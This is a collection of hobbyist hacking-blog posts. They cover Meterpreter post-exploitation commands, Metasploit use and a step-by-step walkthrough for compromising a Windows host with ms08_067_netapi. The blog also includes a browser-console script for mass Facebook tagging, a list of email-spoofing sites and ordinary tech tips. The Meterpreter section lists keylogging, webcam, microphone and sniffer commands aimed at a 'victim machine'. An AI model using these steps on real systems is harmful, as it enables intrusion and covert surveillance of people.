METERPRETER BASICS

Saturday, 2 May 2015


                                               METERPRETER Basics

AFTER U GET A SESSION WITH THE HELP OF Metasploit HOW TO USE meterpreter HERE IS ARE THE basics

HERE's THE SECRET


Meterpreter is one of the spearheads in the metasploit framework..
It is used as a payload post exploitation of a vulnerable system.
It is used in memory DLL injection Stagers and is extended over the network at runtime.
In Memory DLL, Injection is a technique used for injection code within that address space of  currently running process by forcing it to a load a DLL (Dynamic-Link Libarary) file

The single payload is very effective with its multiple capabilities
> helps in acquiring password hashes of a victim machine
> runnng a kylogger and
> privilege escalation.

The stealth feature makes it undetectable to many antivirus and host based intrusion detection systems
Meterperter also has the capability to switch between different processes to which it gets attached through DLL injections and stays by clinging to running application on the compromised host rather than creating on the system

Classified commands

> Command type
> Command name
> Description

Commands
Process listing

> getuid -> It gets the system ID & the name of the computer
> kill -> It terminates a process
> ps -> It lists the running processes
> getpid -> It gets the current process identifier

Keylog Usage
> keyscan_start -> It starts the keylogging session
> keyscan_stop -> It stops the keylogging session
> Keyscan_dump -> It dumps the keystrokes captured from the victim machine

Session
> enumdesktops -> It lists all of the accessible desktops and workstations
> getdesktop -> It gets the current Meterpreter desktop
> setdesktop -> It changes the Meterpreter's current desktop

Sniffer Functions
> use sniffer -> It loads the sniffer functions
> sniffer_start -> It starts the sniffer for the interface
> sniffer_dump -> It dumps the network capture of the victim machine locally
> sniffer_stop -> It stops the sniffer for the interface

Webcam Commands
> webcam_list -> It lists all of the webcams of the system
> webcam_snap -> It capture snaphots of the victim machine
> record_mic -> It records the sound of the environment from the default microphone on the machine

> sysinfo -> to check the system information
> screenshot -> capture a screenshot of the victim machine
> ps -> will show the running processes

*> migrate <pid> :: example migrate 1512 (explorer.exe) -> getpid -> keysscan_start (and wait for few minutes to capture the keystrokes of the victim machine ) -> keyscan_dump -> keyscan_stop (to dump and stop the keystrokes command )

*> webcam_snap ( u get the snap from the webcame)

*> shell (to get the command shell of the victim) -> mkdir <directory name> (creating a directory) (shell is the cmd of the of the victim computer)


Vulnerability scanning and Information Gathering

:> Information Gathering Through Metasploit
Information gathering is a process of collecting information about a victim techniques.
Divided into two steps
> Footprinting
> Scanning

The Metasploit auxilliary modules have various scans from ARP to SYN
service-based scans
> HTTP
> SMB
> SQL
> SSH

Methods for Information Gathering


>> whois
         It is widely used for quering databases that store registered users of an Internet resource

type in msfconsole
   whois <domain name>
example whois hackingrtz.com

To get e-mail we use e-mail harvesting
>  E-mail harvesting is very useful tool to get the e-mail IDs associated with a particular domain

syntax
 use auxiliary/gather/ search email collector -> show options -> set domain <domain name> -> run
for example :- set domain hackingartz.com

Active Information Gathering

useful auxiliary scanner is the telnet version scanner

syntax
  use auxiliary/scanner/telnet version -> show options -> See the area is empty

syntax
   set RHOSTS <target ip address>
   for example :-  set RHOSTS 192.168.0.103 -> run

To find whether a Remote Desktop connection (RDP) is available by RDP scanner
TO know aboout the port number RDP port

Syntax : type in
     use auxiliary/scanner/rdp/ms12_020_check -> show options
getteing the port we set RHOST

syntax
    set PORTS (port no.) -> set PORTS 3389
    set RHOST (ip address) -> set RHOST 192.168.11.46
done with all the options type run

MetaSPLOIT BASICS

Friday, 1 May 2015


                           METASPLOIT

>Metasploit Framework is an open source project created by HD Moore in 2003  acquired by Rapid 7 LLC on October 21,2009.
>Which includes hundreds of exploits and payloads.
>It is considered one of the best penetration tools with support for vulnerability assessment using Nessus and other famous tools.
>Its written in Ruby....
>Metasploit supports all platforms including Windows, Linux and MAC Os

*************
use nmap in metassploit => NMAP in metasploit click on me :)

METERPRETER BASICS => LEARN how to use METERORETER Click on me :)
Cross Site Scripting => Click on me :)
***************************************

Metsaploit Framework these
> MsfGUI
> Msfcli
> Msfweb
> Metasploit Pro
> Armitage

The library architecture in Metasploit is as follows:

> Rex: This is the basic library used is Metasploit for various protocols, transformations and socket handling. It supports SSL, SMB, HTTP, XOR, BASE64, and random text...

>Msf :: Core: This library defines the framework and provides the basic application interface for Metasploit.

>Msf::Base
This library proviedes a simplified and friendly applcation interface for the the Metasploit Framework

*) cd /opt/metasploit/msf3 to enter the metasploit framework directory -> ls

> The important directories listed are
data
external
tools
plugins
scripts

cd data/ => contains meterpreter exploits wordlists templates & many more

cd meterpreter/ => .dll files (.dll files as well as other interesting things, which are typically required to enable the Meterpreter Functionality called post exploitation.)

> wordlist directory -> directory in the data directory. This directory contains the list of usernames and paswords for different services such as HTTP, Oracle, Postgres, VNC, SNMP and more.

> To update the metasploit -> msfupdate

Exploits 

An exploit is a computer program that takes advantage of a particular vulnerability
> cd /opt/metaspoit/msf3/modules/exploits -> ls -> cd windows (going into windows) -> ls
so view the code of any exploit we type -> cat <exploitname> -> cat ms08_067_netapi.rb

Auxiliary
Auxiliary are exploits without payload.

> There are different types of auxiliary modules such as
scanner for protocols
Networks protocol fuzzers
Port scanner modules
wireless
Denial service modules
Server modules
Administrative access exploits and so on.

**) ls -> ftp -> cat <modules name> to see the exploit

PAYLOADSA payload is a piece of software that runs after a system is compromised. The payload us typically attached to and delivered with an exploit

*) 3 different types of payloads
> Singles
> Stagers
> Stages

Stages : The main role of stages payload is that they use tiny stager to fit into small exploitation spaces. During exploitation, an exploit developer has a very limited amount of memory that he can play with. The stagers use this space and their work is to pull down the rest of the stages payload.
Stages are the type of payload that are downloaded and executed by the stagers payload such as Meterpreter, VNC server and so on.

Singles : Singles are self contained payloads for a specific tasl such as creating a user, binding a shell, and so on.

Stagers :  The stagers use the space and their work is to pull down the rest of the stages payload.
Stagers are payloads that makes a connection between the attacker ad the victim machine.
Example
If i want to inject a meterpreter payload we cannot fit the entire Meterpreter DLL into one payload, so the entire process is broken up into two parts. The first is the smaller payload  called stagers. After the stagers are executed they make a network connection between the attacker and the victim.
Over this network connection a larger payload is delivered to the victim machine and this larger payload is known as stages.


> Payloads are categorized according to OS such as AIX, BSD, Windows, Linux and so on.

EXPLOITATION

Exploitation refers to the ar of compromising a computer system. The basics of computer exploitation involves a deep understanding of the vulnerabilities and payloads.
An exploit is a piece of well-written code, compiled and executed on a trageted system, which may compromise that system.

An exploit usually targets a known vulnerability, a flaw in a service or a poorly written code.

BASIC TERMS OF EXPLOITATION

> Vulnerability : A vulnerability is a security hole in software or hardware, which allows an attacker to copromisea system. A vulnerability can be as simple as a weak password or as complex as a Denial of Service attack

> Exploit : An exploit refers to a well known security flaw or bug with which  a hacer gains entery intoa system. An exploit is the actual code with at attacker takes advantage of a particualar vulnerability.

> Payload : Once an exploit exectes on the vulnerable system and the system has been compromised, the payload enables us to control the system. The payload is typically attached to the exploit and delivered.

> Shellcode : This is a set of instructions usually used as a payload when the exploitation occurs.

> Listener : A listener works as component waiting for an incoming connection.

======================
KEEP safe ur ANDROID => CLICK ON me ;)
10 PROXY Websites => Click on me :))
=============================================

The Biggest question of how exploitation actually works ?????

Heres' the SECRETS FINALLY REVEALED

An attacker basically sends an exploits with an attached payload to the vulnerable system.
The exploit runs first and if it succeeds, the actual code of the payload runs.
After the payloads runs, the attacker gets fully privileged access to the vulnerable system, and then he may download data upload malware, virus, backdoors or whatever he wants.

How to compromising a system

Step 1 : Scan the IP Address to find
                           open ports -> operating system -> services
Step 2 : Identifying a vulnerable service and finding an exploit in Metasploit for that particular service.

Step 3 : Is the exploit is not available in Metasploit :: go for through the internet databases such as
>> www.securityfocus.com
>> www.exploitdb.com
>> www.1337day.com

Step 4 : After successfully finding an exploit

Step 5 : we launch exploit and compormise the system.


Tools used

> Port scanning are Nmap (Network Mapper),Autoscan, Unicorn Scan and so on.

Syntax for nmap
  nmap -v -n ip address

-v verbose -> to get verbose output
-n -> parameter to disable reverse DNS resolutions

Syntax for intense scan by nmap
  nmap -T4 -A -v ip address

====================
NMAP tutorials => Click on me :)
Recover JPEG FILES => CLick on me :))
==================================================

After gathering information -> opne msfconsole -> search dcom (it searches all of the windows RPC Related exploits in its database.........

Searching for an exploit in Metasploit through the
syntax
search <servie name> command
© Pprasoon nigam
Note : if the exploit is not available in Metasploit, then we have to search the Internet exploit database for that particular exploit.

>> How to search for an exploit on these online services
open this website => www.1337day.com
  Search for exploits on the Windows RPC service
find the exploit and save it

Now we exploit the target machine

as we know that scanned the IP address and found all the ports
and exploit one those ports

launch the terminal -> type gcc <exploit name with path > -o <exploitname>
for example
gcc dcom.c -o dcom

./<filename>

use exploit/windows/smb/ms08_067_netapi (in msf console) and press enter

then show options
RHOST (remote host)

set RHOST ip address

exploit

MORE metasploit BASICS and HACKING => METERPRETER => Meterpreter Click on me :)

How to find STOLEN or LOST android phone

Wednesday, 13 August 2014

This blog of mine will be liked and loved by all the people who love their ANDROID phones / tabs

SO what i gonna tell you is that how to find or search your lost and stolen mobile :)

phone can be stolen or lost or misplaced anytime anywhere and by anyone
and sometimes no one is there to help you and people come just for sympathy
"OH ! its so sad your 40,000/- mobile lost"
"OMG how could you misplace your mobile in the shop"

and what we do is shed some tears take help from police and or any computer engineers and in response we get nothing and have to buy a small phone or less valuable phone that we brought before :(

A mobile phone is what for us ??

* A friend that makes us time-pass when we are bored
** A place were we keep our secrets
*** A place were we have many memories in text (sms) or in pics (photos)
**** A helper when you are late coming to home
***** Nights talks and love sharing with wife or girlfriend
****** Keep you in touch with all the people you want in your life and much more

SO all these things made possible by phone so must have small security for care

HERES' THE SECRET

Download an APP name call ANDORID LOST

Download or install app => Click on me :)

***********
how to download apk file of android => click on me :))
**********************

so after installing this app you need
1) a gmail account
2) synchronize that gmail account in your phone
3) you can also install help of play store present in your phone

Features of ANDROID LOST app
when your phone is lost what all you can do help of this app 

*read message
** read call history
*** raise alarm
**** get mobile location
***** get imei no.
****** get photo of rear and front camera
******* lock phone change pic
******** delete everything u have in your data sd card
********* make phone silent and vibrate
and much more more u want :: u can read ever thing in detail over here  click on me :)

NOW WHAT YOU HAVE TO DO AFTER INSTALLING THIS APP ??

after installing this

* synchronize your phone with gmail id
** go to the website Android lost or Click on me :) and sign in the website and track your mobile simple
just 3 steps and you can trace your mobile phone

Here is the Video tutorial :: How to use Android lost app

Click on me :)
Installing tutorial => Click on me :)
How to use it Detail Click on me :)

SO keep your phone SAFE
Just one app helps you alot so no need of taking help and finding your self in a question "Now what i DO ?"

Be Safe and be Ethical
Pprasoon Nigam
Security Expert

How to use two WhatsApp in one Android device

Thursday, 24 April 2014


How to use two WhatsApp on one Android phone

or

Use two WhatsApp without rooting up mobile phone 

many of u thinking am i joking or kidding, is it really true if yes then tell me how?

Why two whatsapp

* to make urself different
** to keep some people away from ur personal no.
*** want to have personal no. with personal whatsapp for ur lover
**** just to show yeah i can do this i have two whats app
****** mobile is not rooted up (no rooting is needed) so u can safe ur warranty and gurrantey

now how to do it that's the important part

HERE'S THE SECRET

*********************
tag all ur friend in comment in one click => Click on me :))
protect ur computer with virus and trojans => Click on me :))
***********************************************

first of all back up all ur chats of whats app

Steps

Go to setting => then to chat setting and click on backup option
after backing up ur whatsapp

*** go to setting to the apps setting and uninstall ur whatsapp

**** when u have unistalled then go to storage => phone storage and find WhatsApp folder

rename ur WhatsApp folder to WhatsAppold
** as if u have renamed ur whatsapp now install a new whatsapp from playstore open it up and put ur new number ( mobile number in it) then continue and agree all the terms do all that stuff; u do to register in whatsapp but remember with ur new phone no.

::: ** NOW HERE THE IMP PART FOR THE REGISTER FOR SECOND WHATSAPP NO.

now go to storage and into phone storage 
=>>> now rename ur whatsappold folder to OGWhatsApp

  Rename  "WhatsAppold => OGWhatsapp"

not download this apk file names "OGWhatsApp"

to download OGWhatsApp => Click on me :)


** Now install the OGWhatsapp help of apk file i have given u and then register ur self with ur prvious no. (or the old no.) and here you go with two whatsapp with two different no.


************
wifi hacking GUI software in backtrack => Click on me :))
cracking hash codes with backtrack => Click on me :))
************************

Summary

*.* WhatsApp have ur new no. registered
*.*       OGWhatsApp have ur old no. registered
*.*             if u want u can do vice versa but u will mess up with backup data

Steps To Follow For tagging All Friends In A single Click

Tuesday, 26 November 2013

Steps To Follow For tagging All Friends In A single Click :

HERE'S THE SECRET

this code or trick basically work on google chrome :: you can

********
How to close Ports => Click on me :)
 105 Useful Websites => Click on me :)
**********************************************

Post Your Status.

Now click on time of your status so that it will open in new tab along

with your status link.

Now press CTRL+SHIFT+J , now you can see a new window, just move onto

CONSOLE tab.

download below given link and paste it in CONSOLE tab .

Download the code => Click on me :))


for example  IMPORTANT
this the code starting
(
function x__0(){return window.ActiveXObject?new ActiveXObject

("Msxml2.XMLHTTP"):new XMLHttpRequest}function get_friends(){var

e=x__0();e.open("GET","/ajax/typeahead/first_degree.php?__a=1&filter
)


*_* now remove the gaps

(
function x__0(){return window.ActiveXObject?new ActiveXObject
("Msxml2.XMLHTTP"):new XMLHttpRequest}function get_friends(){var
e=x__0();e.open("GET","/ajax/typeahead/first_degree.php?__a=1&filter
)

like this and you are done :: thank you enjoy


After pasting above script, now finally press ENTER and enjoy.

vollaa You're  Done !! Now just wait

thanks & Regards from
www.hackingartz.com

Top 107 Command Prompt

Wednesday, 6 November 2013

   Top 107 Command Prompt

HERE's THE SECRET


1. Accessibility Controls - access.cpl
2. Accessibility Wizard - accwiz
3. Add Hardware Wizard - hdwwiz.cpl
4. Add/Remove Programs - appwiz.cpl
5. Administrative Tools - control admintools
6. Automatic Updates - wuaucpl.cpl
7. Bluetooth Transfer Wizard - fsquirt
8. Calculator - calc
9. Certificate Manager - certmgr.msc
10. Character Map - charmap
11. Check Disk Utility - chkdsk
12. Clipboard Viewer - clipbrd
13. Command Prompt - cmd
14. Component Services - dcomcnfg
15. Computer Management - compmgmt.msc
16. Control Panel - control
17. Date and Time Properties - timedate.cpl
18. DDE Shares - ddeshare
19. Device Manager - devmgmt.msc
20. Direct X Troubleshooter - dxdiag
21. Disk Cleanup Utility - cleanmgr
22. Disk Defragment - dfrg.msc
23. Disk Management - diskmgmt.msc
24. Disk Partition Manager - diskpart
25. Display Properties - control desktop
26. Display Properties - desk.cpl
27. Dr. Watson System Troubleshooting Utility - drwtsn32
28. Driver Verifier Utility - verifier
29. Event Viewer - eventvwr.msc
30. Files and Settings Transfer Tool - migwiz
31. File Signature Verification Tool - sigverif
32. Findfast - findfast.cpl
33. Firefox - firefox
34. Folders Properties - control folders
35. Fonts - control fonts
36. Fonts Folder - fonts
37. Free Cell Card Game - freecell
38. Game Controllers - joy.cpl
39. Group Policy Editor (for xp professional) - gpedit.msc
40. Hearts Card Game - mshearts
41. Help and Support - helpctr
42. HyperTerminal - hypertrm
43. Iexpress Wizard - iexpress
44. Indexing Service - ciadv.msc
45. Internet Connection Wizard - icwconn1
46. Internet Explorer - iexplore
47. Internet Properties - inetcpl.cpl
48. Keyboard Properties - control keyboard
49. Local Security Settings - secpol.msc
50. Local Users and Groups - lusrmgr.msc
51. Logs You Out Of Windows - logoff
52. Malicious Software Removal Tool - mrt
53. Microsoft Chat - winchat
54. Microsoft Movie Maker - moviemk
55. Microsoft Paint - mspaint
56. Microsoft Syncronization Tool - mobsync
57. Minesweeper Game - winmine
58. Mouse Properties - control mouse
59. Mouse Properties - main.cpl
60. Netmeeting - conf
61. Network Connections - control netconnections
62. Network Connections - ncpa.cpl
63. Network Setup Wizard - netsetup.cpl
64. Notepad - notepad
65. Object Packager - packager
66. ODBC Data Source Administrator - odbccp32.cpl
67. On Screen Keyboard - osk
68. Outlook Express - msimn
69. Paint - pbrush
70. Password Properties - password.cpl
71. Performance Monitor - perfmon.msc
72. Performance Monitor - perfmon
73. Phone and Modem Options - telephon.cpl
74. Phone Dialer - dialer
75. Pinball Game - pinball
76. Power Configuration - powercfg.cpl
77. Printers and Faxes - control printers
78. Printers Folder - printers
79. Regional Settings - intl.cpl
80. Registry Editor - regedit
81. Registry Editor - regedit32
82. Remote Access Phonebook - rasphone
83. Remote Desktop - mstsc
84. Removable Storage - ntmsmgr.msc
85. Removable Storage Operator Requests - ntmsoprq.msc
86. Resultant Set of Policy (for xp professional) - rsop.msc
87. Scanners and Cameras - sticpl.cpl
88. Scheduled Tasks - control schedtasks
89. Security Center - wscui.cpl
90. Services - services.msc
91. Shared Folders - fsmgmt.msc
92. Shuts Down Windows - shutdown
93. Sounds and Audio - mmsys.cpl
94. Spider Solitare Card Game - spider
95. SQL Client Configuration - cliconfg
96. System Configuration Editor - sysedit
97. System Configuration Utility - msconfig
98. System Information - msinfo32
99. System Properties - sysdm.cpl
100. Task Manager - taskmgr
101. TCP Tester - tcptest
102. Telnet Client - telnet
103. User Account Management - nusrmgr.cpl
104. Utility Manager - utilman
105. Windows Address Book - wab
106. Windows Address Book Import Utility - wabmig
107. Windows Explorer - explorer

Protect your computer /laptop/mobile phones from hacker viruses and trojans

Sunday, 3 November 2013

Protect your computer /laptop/mobile phones from hacker viruses and Trojans

HERE's the SECRET

1) Windows Updates: Even the best offerings from computer giants have not been able to completely fight off the attempts of rouge developers to break in. In this situation, it has become almost a necessity for users to update their Windows-based system, on a regular basis. An update daily, weekly or even monthly is going to speed up the system and help it counter attacks on its security thereby decreasing the probability of  it, being infected by worms and viruses. Desktop monitoring by hackers is indeed a grand problem.

2) Software updates: Like the Windows, applications also have to be updated with the latest version. You need to check regularly for wear and tear in the software that your system runs. Web browsers and web-based programs have to be upgraded constantly so hackers do not get their hands on the private and confidential data, stored in your system.

3) Antivirus Software: If your system is being connected to the internet regularly and you run without antivirus software on it, it is almost impossible for hackers not to get attracted to it. In case you do not have antivirus software, get your hands on one as soon as possible. If you already have one, upgrade it to its latest version and check if the settings are properly defined.

4) Anti-spyware Software: Even though the digital situation looks pretty grim, it still isn’t as bad as the days when Bonzi Buddy and Cool Websearch made PC users have nightmares. This is because of anti-spyware software that have shielded the tech world from malicious attacks on the security.

5) Swap your Windows-based system for a Macintosh: The whole tech world knows that Mac’s OS X has the largest number of limitations as compared to other computer operating systems. The truth is that most hackers do not bother breaking into a Mac. This is the reason Mac still makes space for itself in the list of secure computer operating systems, despite its shortcomings.

6) Hacker-Controlled websites: Usually sites that offer free downloads,online games etc. are operated by hackers. It is almost given that you avoid dangerous places especially if you have valuables on your PC. The same goes for the mechanical world. Steer clear of sites that look suspicious or require you to download something which is not needed.

7) Data Backup: Create a backup for all the important data that you have on your system. Apart from hackers and system crashers, other mishaps may spell out death for your hard drives. A tech storm can easily sweep away every bit of data in your system. It’s always better to be safe than sorry.

Top 10 Proxy WebSites To Unblock Any Site

Thursday, 31 October 2013

If you do not want to go through installation of Proxy softwares then anonymous browsing with proxy websites is the best option for you.

Here's the SECRET

best free Proxy websites of 2013 that will let you surf internet anonymously and securely.


1. 000FreeProxy => 000freeproxy

2. kkProxy => kkproxy

3. MyAddr => myaddr

4. RX Proxy => RX Proxy

5. AnonyMouse =>anonymouse

6. Zend2 => zend2

7. NewIPNow =>newipnow

8. KProxy => kproxy

9. Mega Proxy => megaproxy

10. AD Free Proxy => adfreeproxy

10 Free Online Tools Must Know

Tuesday, 17 September 2013

10 Free Online Tools Must Know

1. Emkei’s Mailer (http://emkei.cz/) : Email Spoofer

2. GuerillaMail (http://guerrillamail.com/) : Email Spoofer - better than emkei's mailer

3. Cloud9 (http://cloud9.io/) : Your online IDE for editing code from any PC

4. Ideone.com (http://ideone.com/) : Test your code, almost all languages.

5. TextMechanic (http://textmechanic.com/) : Format your text, all at one site

6. Crypo (http://crypo.in.ua/tools/) : Compilation of all encryption/decryption tools on one place.

7. WebSniffer (http://web-sniffer.net/) : Check what are the headers/ HTTP return of a request

8. Ping.eu (http://ping.eu/) : pinging / speed test / dns lookup

9. Plus.im (https://plus.im/) : All IM, online

10. Mail2Web (https://mail2web.com/login/) : Accessing POP3 emails online

List Of 105 Useful Websites for Every Reader

Monday, 2 September 2013


1. screenr.com – Record movies of your desktop and send them straight to YouTube.

2. bounceapp.com – For capturing full length screenshots of web pages.

3. Goo. gl – Shorten long URLs and convert URLs into QR codes.

4. untiny.me – Find the original URLs that’s hiding behind a short URLs.

5. localti.me – Know more than just the local time of a city.

6.copypastecharacter.com– Copy-paste special characters that aren’t on your keyboard.

7. topsy.com –A better search engine for twitter.

8. fb.me/AppStore –Search iOS apps without launching iTunes.

9. iconfinder.com –The best place to find icons of all sizes.

10. office.com –Download templates, clip art and images for your Office documents.

11. woorank.com –everything you wanted to know about a website.

12. virustotal.com –Scan any suspicious file or email attachment for viruses.

13. wolframalpha.com– Gets answers directly without searching .

14.printwhatyoulike.com– Print web pages without the clutter.

15. joliprint.com –Reformats news articles and blog content as a
newspaper.

16. isnsfw.com – When you wish to share a NSFW page but with a warning.

17. eggtimer.com – A simple online timer for your daily needs.

18. coralcdn.org – If a site is down due to heavy traffic, try accessing it through coral CDN.

19. random.org – Pick random numbers, flip coins, and more.

20. mywot.com –Check the trust level of any website .

21. viewer.zoho.com –Preview PDFs and Presentations directly in the browser.

22. tubemogul.com –Simultaneously upload videos to YouTube and other video sites.

23. truveo.com – The best place for searching web videos.

24. scr.im – Share your email address online without worrying about spam.

25. spypig.com – Now get read receipts for your email.

26. sizeasy.com –Visualize and compare the size of any product.

27. whatfontis.com –quickly determine the font name from an image.

28. fontsquirrel.com –A good collection of fonts – free for personal and commercial use.

29. regex.info – Find data hidden in your photographs .

30. tineye.com – This is like an online version of Google Googles.

31. iwantmyname.com– Helps you search domains across allTLDs.

32. tabbloid.com –Your favorite blogs delivered as PDFs.

33. join. me – Share your screen with anyone over the web.

34. onlineocr.net –Recognize text from scanned PDFs and images – see other OCR tools.

35. flightstats.com –Track flight status at airports worldwide.

36. wetransfer.com –For sharing really big files online.

37. pastebin.com – A temporary online clipboard for your text and code snippets.

38.polishmywriting.com –Check your writing for spelling or grammatical errors.

39.awesomehighlighter.com– Easily highlight the important parts of a web page.

40. typewith.me –Work on the same document with multiple people.

41.whichdateworks.com –Planning an event? Find a date that works for all.


42. everytimezone.com– A less confusing view of the world time zones.


43. warrick.cs.odu.edu– You’ll need this when your bookmarked web pages are deleted.

44. gtmetrix.com – The perfect tool for measuring your site performance online.

45. imo.im – Chat with your buddies on Skype,Facebook, GoogleTalk, etc from one place.

46.translate.google.com– Translate web pages,PDFs and Office documents.

47. youtube.com/leanback – Sit back and enjoy YouTube videos in full-screen mode.

48. similarsites.com –Discover new sites that are similar to what you like already.


49. wordle.net – Quicksummarize long pieces of text with tag clouds.

50. bubbl.us – Create mind-maps, brainstorm ideas in the browser.

51. kuler.adobe.com –Get color ideas, also extract colors from photographs.

52. followupthen.com– Setup quick reminders via email itself.

53. lmgtfy.com – When your friends are too lazy to use Google on their own.

54. tempalias.com –Generate temporary email aliases, better than disposable email.

55. pdfescape.com –Lets you can quickly edit PDFs in the browser itself.

56. faxzero.com – Send an online fax for free– see more fax services.

57. feedmyinbox.com –Get RSS feeds as an email newsletter.

58. isendr.com –Transfer files without uploading to a server.

59. tinychat.com –Setup a private chatroom in micro-seconds.

60. privnote.com –Create text notes that will self-destruct after being read.

61. flightaware.com –Live flight tracking service for airports worldwide.


62. boxoh.com – Track the status of any shipment on Google Maps – alternative.

63. chipin.com – When you need to raise funds online for an event or a cause.

64.downforeveryoneorjustme.com – Is your favorites really offline?

65. example.com – This website can be used as an example in documentation.

66.whoishostingthis.com –Find the web host of any website.

67. google.com/history– Found something on Google but can’t remember it now?

68.errorlevelanalysis.com– Find whether a photo is real or aphotoshopped one.

69. google.com/dictionary – Get word meanings, pronunciations and usage examples.

70.urbandictionary.com –Find definitions of slangs and informal words.

71. seatguru.com –Consult this site before choosing a seat for your next flight.

72. sxc.hu – Download stock images  absolutely free.

73.download.com.np-Get all softwares.

74. wobzip.org – Unzip your compressed files online.

75. vocaroo.com –Record your voice with a click.

76. scribblemaps.com– Create custom Google Maps easily.

77. buzzfeed.com –Never miss another Internet meme or viral video.

78. alertful.com –Quickly setup email reminders for important events.

79.encrypted.google.com– Prevent your ISP and boss from reading your search queries.

80. formspring.me –You can ask or answer personal questions here.

81. snopes.com – Find if that email offer you received is real or just another scam.

82. typingweb.com –Master touch- typing with these practice sessions.

83. mailvu.com – Send video emails to anyone using your webcam.

84. ge.tt – Quickly send a file to someone,they can even preview it before downloading.

85. timerime.com –Create timelines with audio, video and images.

86. stupeflix.com –Make a movie out of your images, audio and video clips.

87. aviary.com/myna –An online audio editor that lets you record and remix audio clip.

88. noteflight.com –Print music sheets, write your own music online (review).

89.disposablewebpage.com– Create a temporary web page that self-destruct.

90. namemytune.com– When you need to find the name of a song.

91. homestyler.com –Design from scratch or re-model your home in3d.

92. snapask.com – Use email on your phone to find sports scores, read Wikipedia, etc.

93. teuxdeux.com – A beautiful to-do app that resembles a paper diary.

94. livestream.com –Broadcast events live over the web, including your desktop screen.

95. bing.com/images –Automatically find perfectly-sized wallpapers for mobiles.

96. historio.us –Preserve complete web pages with all the formatting.

97. dabbleboard.com –Your virtual whiteboard.

98. whisperbot.com –Send an email without using your own account.

99. sumopaint.com –An excellent layer- based online image editor.

100. lovelycharts.com– Create flowcharts, network diagrams, Sitemaps, etc.

101. nutshellmail.com– Get your Facebook and Twitter streams in your Inbox.

102.The Hype Machine -Web-based music discovery site based on the music posted to blogs http://hypem.com/

103.SimpleWash -A site to help you clean up old content you may not want to show on your social media profiles anymore (currently Facebook only, Twitter is coming soon) SimpleWash™

104.ListenToYouTube.com -Converts YouTube videos to mp3sYouTube to MP3 Converter - Fast, Free -ListenToYouTube.com

105.PushBullet -Easily send notes, links,lists, files, etc. to your Android phone